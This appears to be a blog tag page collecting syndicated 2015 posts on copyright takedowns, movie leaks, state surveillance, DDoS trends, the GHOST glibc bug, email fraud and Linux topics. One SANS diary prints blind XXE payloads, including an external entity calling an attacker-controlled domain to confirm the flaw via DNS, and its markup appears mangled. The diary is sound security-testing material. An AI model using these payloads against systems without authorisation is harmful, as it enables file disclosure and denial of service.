Posts tagged ‘Other’

TorrentFreak: Reddit Rejects 62% of All Copyright Complaints

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

reddit-alienReddit is without doubt one of the most popular sites on the Internet. The community-driven behemoth is the world’s 28th most popular site according to Alexa, rising to 9th most trafficked in the United States.

Founded in 2005, the vocal SOPA opponent‘s last set of published stats (Oct 2014) paint an awesome picture: 174 million unique visitors from 186 countries viewed some 6.1 billion pages.

Aside from posting the latest breaking news, AMAs, plus a million items in between, it will come as no surprise that in 2014 some of Reddit’s users also infringed copyright. Details of subsequent complaints have previously remained private but thanks to the publication of Reddit’s very first transparency report, we now have more of an insight.

While the company has some fascinating thoughts on copyright (which we’ll come to in a moment) it’s notable how few takedown requests Reddit receives.

red-takedownsIn 2014 the site received just 218 requests to remove content, 81% of which were DMCA-style copyright notices.

Interestingly and unlike those who send the notices, Reddit reveals that “real humans” examine each and every request received. It’s clear that in many cases they don’t like what they see.

From 176 DMCA complaints received, Reddit removed content in just 76 instances, 38% compliance overall. For a variety of reasons, in 62% of cases Reddit rejected notices completely.

Overbroad

As previously reported here on TF, on many occasions copyright holders have approached Google in an attempt to have entire Reddit communities removed from its indexes. The search engine mostly rejects those requests and Reddit isn’t impressed by them either.

“We received many copyright takedown requests for entire subreddits. We (and the DMCA) require specific identification of allegedly infringing content, not broad demands to delete entire reddit communities,” the company reveals.

Links don’t infringe copyright

Reddit doesn’t host any content of its own but instead users can post links to material hosted elsewhere, which they do in their millions every day. However, when those links point to infringing content such as movies, music or TV shows, copyright holders tend to see that as facilitation of infringement. Nevertheless, Reddit has its own opinions on what breaches the law.

“A significant percentage of the copyright takedown requests we received were for user-submitted URLs that link to content hosted on other websites. Because links do not generally infringe copyright, we exercise extra scrutiny in assessing takedowns for links,” the company says.

Of course, Google might argue the same point but instead it removes millions of links to content every single week.

Notices fail to meet legal requirements

Under the DMCA a copyright holder can request content to be removed from a third-party website via the sending of a properly formatted DMCA notice. Such notices must include:

– A physical or electronic signature of the person authorized to act on behalf of the copyright holder
– Clear identification of the original infringed work
– Clear identification of the allegedly infringing content

According to Reddit, many notice senders fail to make the grade.

“We rejected many copyright takedown requests because they did not include the information required by the Digital Millennium Copyright Act (DMCA),” the company reports.

Conclusion

Overall and despite its millions of users, it appears that Reddit does not have a significant copyright infringement problem, despite the fact that several sub-reddits are dedicated to linking to infringing content. For now most copyright holders are ignoring the site, while others prefer to complain to Google instead.

Reddit’s 2014 Transparency Report can be downloaded here (pdf).

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

LWN.net: Plasma 5.2 Is Beautiful and Featureful (KDE.News)

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

We are a bit late in noting that KDE has released Plasma 5.2 on January 27. This KDE.News article gives a tour of the desktop that will be featured in upcoming Kubuntu and Fedora KDE spin releases (and probably other distributions as well). There are lots of new features and bug fixes in the release, see the changelog for all the details. “In the screen locker we improved the integration with logind to ensure the screen is properly locked before suspend. The background of the lock screen can be configured. Internally this uses part of the Wayland protocol which is the future of the Linux desktop.

There are improvements in the handling of multiple monitors. The detection code for multiple monitors got ported to use the XRandR extension directly and multiple bugs related to it were fixed.”

SANS Internet Storm Center, InfoCON: green: Blindly confirming XXE, (Thu, Jan 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Almost exactly a year ago I posted a diary called Is XXE the new SQLi? you can read it at https://isc.sans.edu/diary/Is+XXE+the+new+SQLi/17375. In last year, the things have not changed a lot regarding XXE vulnerabilities. They still seem to be popping up here and there, depending on how XML documents are consumed by server side applications.

Recently I had an interesting engagement where the server side web application consumed an XML document submitted by a user (through a web browser, in a POST HTTP request). Of course, whenever you see XML being used, you should always test for existence of XXE vulnerabilities since their impact can be quite serious check the original diary and can lead from Denial of Service attacks to disclosure of arbitrary files.

In this specific case, however, the problem was that while the application processed the submitted XML document, it never outputted anything from the document: the application would only echo back if processing was successful or not.

So the question that came in mind was on how to confirm if the target application was vulnerable to XXE or not? Sure, I could try to launch a DoS attack to see if it works or not, but since I was dealing with a semi-production system, this was not an option.

Almost like blind SQL injection

This case is very similar to blind SQL injection vulnerabilities: we can modify the input and while we cannot see the output directly, we can deduce what happened on the server side. Let”>DocumentLayer
Document InternalID=1
DocumentPointerTest/DocumentPointer
/Document
/DocumentLayer

Of course, in the real test the XML document was much more complex and had some logic for the backend application “>DocumentPointer”>!DOCTYPE DocumentLayer [
!ELEMENT DocumentLayer ANY
!ENTITY xxe Test ]
DocumentLayer
Document InternalID=1
DocumentPointer/DocumentPointer
/Document
/DocumentLayer

Simple! If this works, it means that we blindly confirmed that the XML processor on the server side used our reference to the xxe entity. Cool.
The next step is to see if we can use external entities. However, again, since we cannot see the results of the XXE injection, its not all that simple. To make things more complex, the backend server is behind a firewall that does not let this machine connect directly to anything on the Internet. This stops us from using a SYSTEM external entity with a URL supplied.

So is there any other way to confirm that external entities are supported? Probably yes there is one protocol that is almost always allowed, in one sense or another: DNS. In this particular case, this means that we can craft external entity which will resolve to a domain name that we control by checking DNS requests we can see if the entity was resolved correctly or not. In this case it does not matter if the backend server cannot access the Internet or not “>!DOCTYPE DocumentLayer [
!ELEMENT DocumentLayer ANY
!ENTITY xxe SYSTEM http://thisdomaindoesnotexist.infigo.hr/test.txt ]
DocumentLayer
Document InternalID=1
DocumentPointer/DocumentPointer
/Document
/DocumentLayer

While this document will not be processed correctly (remember, the DocumentPointer element must contain the text string Test), the reference will be resolved by the XML processor and by observing the DNS traffic on DNS servers for our domain we will see a request for the submitted domain which will allow us to confirm that XXEs are resolved by the target application.

So, to wrap things up we blindly confirmed the XXE vulnerability in the target application. While in this case our exploitation options are unfortunately limited only to DoS, it is worth noting that the vulnerability exists, and that its only a matter of time when it can be abused further, unless patched.


Bojan
@bojanz
INFIGO IS

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: The Internet of Dangerous Things

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Distributed denial-of-service (DDoS) attacks designed to silence end users and sideline Web sites grew with alarming frequency and size last year, according to new data released this week. Those findings dovetail quite closely with the attack patterns seen against this Web site over the past year.

Arbor Networks, a major provider of services to help block DDoS assaults, surveyed nearly 300 companies and found that 38% of respondents saw more than 21 DDoS attacks per month. That’s up from a quarter of all respondents reporting 21 or more DDoS attacks the year prior.

KrebsOnSecurity is squarely within that 38 percent camp: In the month of December 2014 alone, Prolexic (the Akamai-owned company that protects my site from DDoS attacks) logged 26 distinct attacks on my site. That’s almost one attack per day, but since many of the attacks spanned multiple days, the site was virtually under constant assault all month.

Source: Arbor Networks

Source: Arbor Networks

Arbor also found that attackers continue to use reflection/amplification techniques to create gigantic attacks. The largest reported attack was 400 Gbps, with other respondents reporting attacks of 300 Gbps, 200 Gbps and 170 Gbps. Another six respondents reported events that exceeded the 100 Gbps threshold. In February 2014, I wrote about the largest attack to hit this site to date — which clocked in at just shy of 200 Gbps.

According to Arbor,  the top three motivations behind attacks remain nihilism vandalism, online gaming and ideological hacktivism— all of which the company said have been in the top three for the past few years.

“Gaming has gained in percentage, which is no surprise given the number of high-profile, gaming-related attack campaigns this year,” the report concludes.

DDoS Attacks on KrebsOnSecurity.com, logged by Akamai/Prolexic between 10/17/14 - 1/26/15.

DDoS Attacks on KrebsOnSecurity.com, logged by Akamai/Prolexic between 10/17/14 – 1/26/15.

Longtime readers of this blog will probably recall that I’ve written plenty of stories in the past year about the dramatic increase in DDoS-for-hire services (a.k.a. “booters” or “stressers”). In fact, on Monday, I published Spreading the Disease and Selling the Cure, which profiled two young men who were running both multiple DDoS-for-hire services and selling services to help defend against such attacks.

The vast majority of customers appear to be gamers using these DDoS-for-hire services to settle scores or grudges against competitors; many of these attack services have been hacked over the years, and the leaked back-end customer databases almost always show a huge percentage of the attack targets are either individual Internet users or online gaming servers (particularly Minecraft servers). However, many of these services are capable of launching considerably large attacks — in excess of 75 Gbps to 100 Gpbs — against practically any target online.

As Arbor notes, some of the biggest attacks take advantage of Internet-based hardware — everything from gaming consoles to routers and modems — that ships with networking features that can easily be abused for attacks and that are turned on by default. Perhaps fittingly, the largest attacks that hit my site in the past four months are known as SSDP assaults because they take advantage of the Simple Service Discovery Protocol — a component of the Universal Plug and Play (UPnP) standard that lets networked devices (such as gaming consoles) seamlessly connect with each other.

In an advisory released in October 2014, Akamai warned of a spike in the number of UPnP-enabled devices that were being used to amplify what would otherwise be relatively small attacks into oversized online assaults.

Akamai said it found 4.1 million Internet-facing UPnP devices were potentially vulnerable to being employed in this type of reflection DDoS attack – about 38 percent of the 11 million devices in use around the world. The company said it was willing to share the list of potentially exploitable devices to members of the security community in an effort to collaborate with cleanup and mitigation efforts of this threat.

That’s exactly the response that we need, because there are new DDoS-for-hire services coming online every day, and there are tens of millions of misconfigured or ill-configured devices out there that can be similarly abused to launch devastating attacks. According to the Open Resolver Project, a site that tracks devices which can be abused to help launch attacks online, there are currently more than 28 million Internet-connected devices that attackers can abuse for use in completely anonymous attacks.

Tech pundits and Cassandras of the world like to wring their hands and opine about the coming threat from the so-called “Internet of Things” — the possible security issues introduced by the proliferation of network-aware devices — from fitness trackers to Internet-connected appliances. But from where I sit, the real threat is from The Internet of Things We Already Have That Need Fixing Today.

To my mind, this a massive problem deserving of an international and coordinated response. We currently have global vaccination efforts to eradicate infectious and communicable but treatable diseases. Unfortunately, we probably need a similar type of response to deal with the global problem of devices that can be conscripted at a moment’s notice to join a virtual flash mob capable of launching attacks that can knock almost any target offline for hours or days on end.

Anyone who needs a reminder of just how bad the problem is need only look to the attacks of Christmas Day 2014 that took out the Sony Playstation and Microsoft Xbox gaming networks. Granted, those companies were already dealing with tens of millions of new customers that very same day, but as I noted in my Jan. 9 exclusive, the DDoS-for-hire service implicated in that attack (or at least the attackers) was built using a few thousand hijacked home Internet routers.

[Author’s note: The headline for this post was inspired by Glenn Fleishman‘s excellent Jan. 13, 2015 piece in MIT Technology Review, An Internet of Treacherous Things.]

LWN.net: [$] Pettycoin and sidechaining

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

At linux.conf.au 2015 in
Auckland, Rusty Russell presented a talk
about his personal side-project, Pettycoin. Russell had announced
Pettycoin at LCA 2014; at that time it represented an untested
concept: a way to attach a separate, Bitcoin-like network to the
existing Bitcoin blockchain. Pettycoin’s goal was originally to offer
a simpler and faster “side network” that periodically reconnected to
Bitcoin. In the intervening year, Russell made a lot of progress, but
other new innovations in the Bitcoin arena have led him to question
parts of the Pettycoin approach and consider a reimplementation.

TorrentFreak: How Cunning VOD Pirates Plundered Taken 3

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

taken3-logoSoon after its U.S. premiere on January 9, pirate copies of the new Liam Neeson movie Taken 3 began appearing online. While quality was decent for a ‘cam’ recording, it was nothing to get really excited about.

As it happened that didn’t matter too much since most downloaders were already preoccupied with the recent flood of high quality Oscar screeners. Nevertheless, those who ventured into a cinema to record Taken 3 are likely to have exposed themselves to considerable risk.

In many countries one can end up in jail for such activities, especially when recording is followed by uploading to the Internet. But just a week later new events meant that the Taken 3 pirates’ dance with danger would largely be forgotten.

Last Thursday an HD copy of Taken 3 appeared on all major torrent sites but thanks to an earlier tipoff, that came as no surprise to us. Several days earlier a source already told TF that a “pristine” copy of Taken 3 would become available on January 22. So how did he know? The answer lies thousands of miles away in the Middle East.

OSN is a pay TV network with its headquarters in Dubai, United Arab Emirates. The network offers international entertainment content such as movies, TV shows and sporting events. Perhaps surprisingly to readers in the West, it also provides access to movies still running in U.S. theaters.

As can be seen from the image of an OSN TV screen below, Taken 3 was due to air on the PPV network on January 22.

taken 3

TF was assured that a copy would quickly by pirated using OSN as several other popular movies had also been ‘capped’ from the same source in recent times. Sure enough, the first copies to appear online last Thursday all appeared with tell-tale Arabic subtitles or a suspiciously narrow image window where they’d been cropped out.

taken-arabic

While it’s not easy to say whether all ‘subbed’ copies now online originate from the first original ‘capping’ of Taken 3, we know that the first ‘big’ copy on Western sites (uploaded by a group called CPG) was not the first overall.

Those honors fell to a group called “weleef” who uploaded this “exclusive” to Arabic forum ArabScene shortly after the first showings on OSN.

arabscene-taken

Of course, thanks to this source people from all around the globe were able to watch a good copy of the movie, despite it still playing in cinemas in the United States and elsewhere. Sadly, even those wanting to pay for the movie in the U.S. will have to wait until April 2015 for a VOD release.

Why Hollywood treats citizens in the Middle East and Asia better than its home audience is anyone’s guess, but if defeating piracy is the goal the practice might be backfiring.

Our source says that a Chinese VOD site already has 50 Shades of Grey listed for an end of February release, two weeks after its Valentine’s Day premiere in the U.S. Only a month to find out if that leaks too.

Update: A new and non-subtitled copy of Taken 3 is now flourishing online. The source? An OSN set-top box…

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

Linux How-Tos and Linux Tutorials: Multitasking in the Linux Kernel: Interrupts and Tasklets

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Linux How-Tos and Linux Tutorials. Original post: at Linux How-Tos and Linux Tutorials

In the previous article I mentioned about multithreading. The article covered such basic notions as types of multitasking, the scheduler, scheduling strategies, the state machine, and other.

This time, I want to look at the problem of scheduling from another perspective. Namely, I’m going to tell you about scheduling not threads, but their “younger brothers”. Since the article turned out to be quite long, at the last moment I decided to break it up into several parts:

  1. Multitasking in the Linux Kernel. Interrupts and Tasklets
  2. Multitasking in the Linux Kernel. Workqueue
  3. Protothread and Cooperative Multitasking

In the third part, I will also try to compare all of these seemingly different entities and extract some useful ideas. After a little while, I will tell you about the way we managed to apply these ideas in practice in the Embox project, and about how we started our operating system on a small board with almost full multitasking.

Read more at Vita Loginova’s blog.

Errata Security: Some notes on GHOST

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

I haven’t seen anybody compile a list of key points about the GHOST bug, so I thought I’d write up some things. I get this from reading the code, but mostly from the advisory.

Most things aren’t vulnerable. Modern software uses getaddrinfo() instead. Software that uses gethostbyname() often does so in a way that can’t be exploited, such as checking inet_addr() first. Therefore, even though software uses the vulnerable function doesn’t mean it’s actually vulnerable.

Most vulnerable things aren’t exploitable. This bug is hard to exploit, only overwriting a few bytes. Most of the time, hackers will only be able to crash a program, not gain code execution.

Many exploits are local-only. It needs a domain-name of a thousand zeroes. The advisory identified many SUID programs (which give root when exploited) that accept such names on the command-line. However, it’s really hard to generate such names remotely, especially for servers.

Is this another Heartbleed? Maybe, but even Heartbleed wasn’t a Heartbleed. This class of bugs (Heartbleed, Shellshock, Ghost) are hard to exploit. The reason we care is because they are pervasive, in old software often going back for more than a decade, in components used by other software, and impossible to stamp out completely. With that said, hackers are far more likely to be able to exploit Shellshock and Heartbleed than Ghost. This can change quickly, though, if hackers release exploits.

Should I panic? No. This is a chronic bug that’ll annoy you over the next several years, but not something terribly exploitable that you need to rush to fix right now.

Beware dynamic and statically linked libraries. Most software dynamically links glibc, which means you update it once, and it fixes all software (after a reboot). However, some software links statically, using it’s own private copy of glibc instead of the system copy. This software needs to be updated individually.

There’s no easy way to scan for it. You could scan for bugs like Heartbleed quickly, because they were remote facing. Since this bug isn’t, it’d be hard to scan for. Right now, about the only practical thing to scan for would be Exim on port 25. Robust vulnerability scanners will often miss vulnerable systems, either because they can’t log on locally, or because while they can check for dynamic glibc libraries, they can’t find static ones. This makes this bug hard to eradicate — but luckily it’s not terribly exploitable (as mentioned above).

You probably have to reboot. This post is a great discussion about the real-world difficulties of patching. The message is that restarting services may not be enough — you may need to reboot.

You can run a quick script to check for vulnerability. In the advisory, and described here, there is a quick program you can run to check if the dynamic glibc library is vulnerable. It’s probably something good to add to a regression suite. Over time, you’ll be re-deploying old VM images, for example, that will still be vulnerable. Therefore, you’ll need to keep re-checking for this bug over and over again.

It’s a Vulnerability-of-Things. A year after Heartbleed, over 200,000 web servers are still vulnerable to it. That’s because they aren’t traditional web-servers, but web interfaces built into devices and appliances — “things”. In the Internet-of-Things (IoT), things tend not to be patched, and will remain vulnerable for years.

This bug doesn’t bypass ASLR or NX. Qualys was able to exploit this bug in Exim, despite ASLR and NX. This is a property of Exim, not GHOST. Somewhere in Exim is the ability to run an arbitrary command-line string. That’s the code being executed, not native x86 code that you’d expect from the typical buffer-overflow, so NX bit doesn’t apply. This vuln reaches the strings Exim produces in response, so the hacker can find where the “run” command is, thus defeating ASLR.

Some pages worth bookmarking:
http://chargen.matasano.com/chargen/2015/1/27/vulnerability-overview-ghost-cve-2015-0235.html
I’ll more eventually here as I come across them.

Krebs on Security: FBI: Businesses Lost $215M to Email Scams

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

It’s time once again to update my Value of a Hacked Email Account graphic: According to a recent alert from the FBI, cyber thieves stole nearly $215 million from businesses in the last 14 months using a scam that starts when business executives or employees have their email accounts hijacked.

Federal investigators say the so-called “business email compromise” (BEC) swindle is a sophisticated and increasingly common scam targeting businesses working with foreign suppliers and/or businesses that regularly perform wire transfer payments.

According to new data from the Internet Crime Compliant Center (IC3) — a partnership between the National White Collar Crime Center and the FBI — the victims of BEC scams range from small to large businesses that may purchase or supply a variety of goods, such as textiles, furniture, food, and pharmaceuticals.

Image: IC3

Image: IC3

One variation on the BEC scam, also known as “CEO fraud,” starts with the email account compromise for high-level business executives (CFO, CTO, etc). Posing as the executive, the fraudster sends a request for a wire transfer from the compromised account to a second employee within the company who is normally responsible for processing these requests.

“The requests for wire transfers are well-worded, specific to the business being victimized, and do not raise suspicions to the legitimacy of the request,” the agency warned. “In some instances a request for a wire transfer from the compromised account is sent directly to the financial institution with instructions to urgently send funds to bank ‘X’ for reason ‘Y.’”

The IC3 notes that the fraudsters perpetrating these scams do their homework before targeting a business and its employees, monitoring and studying their selected victims prior to initiating the fraud.

“Fraudulent e-mails received have coincided with business travel dates for executives whose e-mails were spoofed,” the IC3 alert warns. “The subjects are able to accurately identify the individuals and protocol necessary to perform wire transfers within a specific business environment. Victims may also first receive ‘phishing’ e-mails requesting additional details of the business or individual being targeted (name, travel dates, etc).”

The advisory urges businesses to adopt two-step or two-factor authentication for email, where available, and/or to establish other communication channels — such as telephone calls — to verify significant transactions. Businesses are also advised to exercise restraint when publishing information about employee activities on their Web sites or through social media.

For more info on how to rethink the security of your inbox, check out this post.

Your email account may be worth far more than you imagine.

Your email account may be worth far more than you imagine.

TorrentFreak: Canadian Government Spies on Millions of File-Sharers

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

spyBeing monitored online is a reality largely acknowledged by millions of file-sharers worldwide. Countless rightsholders, anti-piracy outfits, analytics companies and other interested parties crawl BitTorrent and other P2P networks every day, spying on downloads and gathering data.

While the public nature of these networks is perfect for those looking to eavesdrop, individuals who use file-hosting sites are often under the impression that their transfers cannot be monitored by third parties since transactions take place privately from user to site via HTTP.

That assumption has today been blown completely out of the water amid revelations that Canada’s top electronic surveillance agency has been spying on millions of downloads from more than 100 file-sharing sites.

Led by the Communications Security Establishment (CSE), Canada’s equivalent of the NSA, and codenamed LEVITATION, the project unveils widespread Internet surveillance carried out by Canadian authorities.

A document obtained by U.S. whistleblower Edward Snowden and released to CBC News shows that in an effort to track down extremists the spy agency monitors up to 15 million downloads carried out by users around the world every day.

cse-ffu

According to the 2012 document, 102 file-sharing platforms were monitored by CSE. Just three were named – RapidShare, SendSpace, and the now defunct Megaupload. None of the sites were required to cooperate with the Canadian government since CSE had its own special capabilities.

“A separate secret CSE operation codenamed ATOMIC BANJO obtains the data directly from internet cables that it has tapped into, and the agency then sifts out the unique IP address of each computer that downloaded files from the targeted websites,” The Intercept‘s analysis of the document notes.

Once harvested those IP addresses are cross-referenced with vast amounts of additional data already intercepted by the United States’ NSA and its British counterpart GCHQ. Subsequent searches have the ability to show a list of other websites visited by those downloading from file-hosting sites.

Further associations can then be made with Facebook or Google accounts (via Google analytics cookies) which have the potential to link to names, addresses and other personal details. It’s a potent mix but one apparently designed to weed out just a small number of files from millions of daily events.

fewdocs

According to the LEVITATION documents the system has the ability to track downloads in countries across Europe, the Middle East, North Africa and North America.

Under law, CSE isn’t allowed to spy on Canadians, but IP addresses belonging to a web server in Montreal appeared in a list of “suspicious” downloads. Also monitored by CSE were downloads carried out by citizens located in closely allied countries including the U.S., UK, Germany and Spain.

“CSE is clearly mandated to collect foreign signals intelligence to protect Canada and Canadians from a variety of threats to our national security, including terrorism,” CSE spokesman Andrew McLaughlin told CBC.

While it may be of comfort for Canadians to learn that the government is only interested in a small number of files being exchanged outside the country’s borders, mass surveillance of this kind always has the potential to unnerve when mission-creep raises its head.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

TorrentFreak: Amazon Bans BitTorrent App FrostWire Over Piracy Concerns

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

fwlogoTaking “infringing” apps out of popular app stores is one of Hollywood’s key anti-piracy priorities for the years to come.

Various copyright holder groups frequently report “piracy-enabling” apps to Apple, Google, Microsoft and Amazon, alongside requests for the stores to take them offline.

The stores themselves also screen for potentially problematic software. Apple, for example, has notoriously banned all BitTorrent related apps.

This week, Amazon is following in Apple’s footsteps by banning one of the most used BitTorrent clients from its store. The Android version of FrostWire had been listed for well over a year but Amazon recently had a change of heart.

FrostWire developer Angel Leon tells TF that the app was removed without prior warning. When he asked the company for additional details, he was told that Amazon sees his app as a pirate tool.

“In reviewing your app, we determined that it can be used to facilitate the piracy or illegal download of content. Any facilitation of piracy or illegal downloads is not allowed in our program,” Amazon’s support team writes.

fw-mail

Leon was baffled by the response. FrostWire had been a member of the Developer Select program for over a year and always made sure to avoid any links to piracy. On the contrary, FrostWire was actively promoting Creative Commons downloads and other legal content.

“We have never promoted illegal file sharing, we actually promote creative commons downloads, and free legal downloads from soundcloud, archive.org. The app is also a full blown music player, but none of this probably counts,” Leon tells us.

“Web browsers and email clients are still there, programs that also fall in the category of being ‘used to facilitate the piracy or illegal download of content’,” he adds, pointing out the arbitrary decision.

While it’s not clear why Amazon changed its stance towards FrostWire, it wouldn’t be a surprise if pressure from copyright holders played a role.

FrostWire’s developer believes that the mobile developer industry may have to come up with a less censorship prone store in the future. There’s a need for a decentralized app store that secures the interests of both iOS and Android developers.

For now, Leon hopes that other stores will be less eager to pull the plug on perfectly legal apps. While it may seem to be a small decision for the stores, having a popular app removed can ruin a developer’s entire business.

The beauty of FrostWire and other BitTorrent clients is that they offer the freedom to share files with people from all over the world without being censored. Restricting access to apps that make this possible will harm society, Leon believes.

“This is a freedom which eventually protects society from the likes of totalitarian governments, something some of us at FrostWire have lived first hand in Latin America, something that forced me and so many Venezuelans to leave our countries and start again from scratch in the US,” Leon concludes.

Despite being banned from Amazon’s store, Kindle users will still be able to get updates via the FrostWire website. A special installer for Kindle will be available soon.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

Backblaze Blog | The Life of a Cloud Backup Company: The Great Date Debate

This post was syndicated from: Backblaze Blog | The Life of a Cloud Backup Company and was written by: Yev. Original post: at Backblaze Blog | The Life of a Cloud Backup Company

blog-great-date-debate
The Backblaze blog recently went through a lot of changes. We moved our service to the most up-to-date version of WordPress. We changed the design. We changed the layout. We added categories (Cloud Storage, Entrepreneurship, Backing Up, and Backblaze Bits) so that it would be easier to get to the types of articles that you wanted to read. Also, it was time for the blog to look more pretty!

Another big change was the date scheme on our blog. We got rid of it. Why? As the Marketing team started to focus more on generating good content for our followers and fans to read, we decided that it was time to make our blog posts more “evergreen”. Additionally, in our old blog environment the date was included in the URL, which was bad for web search results. Yes, we had delved into the deep, dark arts of SEO (search engine optimization).

The problems started when we would have to go back in time and look for a specific blog post that occurred on a very specific date. For example, if you go to Google and ask it to find you the articles about the Backblaze Storage Pods, it’ll give you a list of 4 blog posts on the topic. Unfortunately though, you wouldn’t know which ones are the most recent, as there are no dates associated with them in Google. We also had problems trying to find other articles, for example the ones about hard drive stats. We would search for them in Google and we’d get a lot of answers, though we wouldn’t know chronologically, which ones were the more timely ones. This led to great internal debates between the practical value and the SEO value of our blog.

This internal debate came to a head last week when we were featured as a top story on Hacker News, where we achieved as high as the 4th rank. While we were thrilled to get that much attention from some key individuals and knowledgeable folks, the main question and indeed the highest rated one was not about the hard drive stats that we produced, but was about the dates missing from our blog. A fine example by user mmastrac:

“Always love reading HDD reliability stats from Backblaze — but this demonstrates one of the reasons why post dating is so important, especially when the information in the post is time-sensitive. Nowhere on the page does it say that the post date is today, unless you click the “latest posts” tab by the author below.

I had originally though it was a repost of the many older articles from Backblaze until seeing a reference to Dec 31 2014. While not terribly ambiguous now, the ambiguity will only grow as the year marches on.

If someone from Backblaze happens to see this: you don’t need to put it in your URL, but please date your post near the top or bottom of the text.”

In my initial response I walked the party line:

“Yev from Backblaze here -> it’s an internal debate as to whether we should put dates on everything. It used to be that they were part of the URL (because of the way our blog was designed) but that is no longer the case. We decided to leave them off for a while to see if that made posts more “evergreen”, but we definitely see where it can lead to some confusion. We’ll keep chatting about it internally, there’s likely a good middle-ground.”

The reaction to me jumping in to the stream was lukewarm at best:

“Date of information is one of the most important contexts in IT. I can’t count the times somebody has said “This says this and that about such and such”, and I have to say “Yeah bro, when was that written? Oh, three years ago? What’s the story now?”.”

I waited for my marketing companions to get to the office and then called for an emergency meeting of the minds. While the SEO value of having the blog posts go undated was good, we decided that it was time to overrule our SEO overlords and bring the blog back to the people. We quickly made the change and I made the following announcement:

“BREAKING NEWS -> There are now dates on all of the individual blog posts. The landing page is “date-free” but is in chronological order, if you open a post, the date will be below the title…AS NATURE INTENDED!”

This was met with thunderous applause:

“That’s amazing – I’m reading the post right now (as in, 11:28 AM pacific)- and I switched back to the tab, and it doesn’t show the date. But I opened it less than 10 minutes ago. They couldn’t have changed it that real time could they. Hit Refresh. Lo and behold – there is the date.

Now that’s an agile organization. Thanks very much – I really appreciate the date on these posts as well.”

For a comparison, when I wrote my initial response about having meetings and pondering about the change, that comment got 29 upvotes. However, when we made the change and I announced it, that got a full 41. Now that’s some real-time customer appreciation!

We try to move quickly and make the right decisions, unfortunately, that doesn’t always work out, and we have be willing to rollback especially when we’ve accidently made the user experience worse. Our blogs are written for our fans after all, and if they aren’t happy with them, we’re not happy with them. We hope you enjoy having the dates back, and I personally appreciate everyone in the Hacker News comments for helping me win an argument!

Author information

Yev

Yev

Chief Smiles Officer at Backblaze

Yev enjoys speed-walking on the beach. Speed-dating. Speed-writing blog posts. The film Speed. Speedy technology. Speedy Gonzales. And Speedos. But mostly technology.

Follow Yev on:

Twitter: @YevP | LinkedIn: Yev Pusin | Google+: Yev Pusin

The post The Great Date Debate appeared first on Backblaze Blog | The Life of a Cloud Backup Company.

Linux How-Tos and Linux Tutorials: Embedded Development with ARM mbed on Linux

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

mbedA microcontroller contains a processor, some memory, and usually has some connections for interacting with external hardware. You might want to use a microcontroller to turn a small servo motor, or connect some buttons and a screen to build a custom calculator, for example. A microcontroller may not run any operating system at all, and simply start executing a single program soon after power is applied.

The mbed platform is an open source environment which allows you to write control programs in C/C++ and deploy them to many ARM Cortex-M based microcontroller boards.

The ARM CPU used in the BeagleBone Black and other single board computers is designed to interface with half to a few gigabytes of RAM and allow a full operating system such as Linux to be run on the computer. (See my long series of reviews on Linux.com of ARM-based computers that run Linux). By contrast the ARM Cortex-M is a microcontroller level chip which might run at 16-100Mhz, contain 2-100kb of RAM, and some flash memory to contain only the program that you want to execute.

You can, however, set up your Linux machine to write control programs for an ARM-based microcontroller using the mbed platform. The mbed IDE can be accessed through a web browser or downloaded to your Linux desktop (see instructions on this, below.)

This setup offers some advantages to embedded developers using microcontrollers. Many readers will likely be familiar with the Arduino environment and have probably used it with the Atmel 328 microcontroller. The mbed platform offers a bit more flexibility by letting you pick both your microcontroller board to best suit your application, as well as allowing you to choose which compiler will best suit your project.

For example, you might have a small program that only needs to use 3-4 pin and a single SPI bus, so a more economic chip is all you will need. On the other hand, you might be running a screen, some DSP code, need some more processing power and want to have around 100kb of memory on board. With mbed you can select a more capable microcontroller that will better handle that application.

Writing programs

The IDE for mbed runs in the Web browser. When you log in you select the target board that you have, open or write a program, compile it, and download the binary to install onto your hardware. When you plug in an mbed microcontroller to your Linux desktop you will see one or more storage devices. These storage devices can be shown in a similar way to a USB flash drive. If there is more than one storage device shown by your Linux desktop, one will likely be very small and one will be around the right size for the flash memory on your mbed hardware.

To install a new program that you downloaded from the mbed IDE just open the storage device and copy the firmware file you downloaded using your Web browser to the mbed device. This avoids the frustration that plagues some embedded environments which want to use /dev/ttyUSBX or an /dev/ACM device files to upload new firmware and the devices do not always show up or appear in menus.

My first thoughts when playing around with mbed were about how well additional hardware was supported. The popularity and years that Arduino has been around have blessed it with a large library base for interacting with various hardware. My initial testing was for the popular Nordic Semiconductor rf24 chips. There are many libraries to support that chip on mbed, including a port of the Maniacbug’s nRF24L01+ Arduino library to mbed.

I actually had quite a time initially getting rf24 communications to work. I was using two Nucleo F401RE boards, and the website for them mentions that you should upgrade their firmware. I had a look over the firmware upgrade page but didn’t see anything that might have caused an issue that I was seeing. I went and performed the firmware upgrade anyway and afterwards the rf24 communication worked well. It is unfortunate that at the moment upgrading the core firmware on the ST Nucleo F401RE was not supported from Linux.

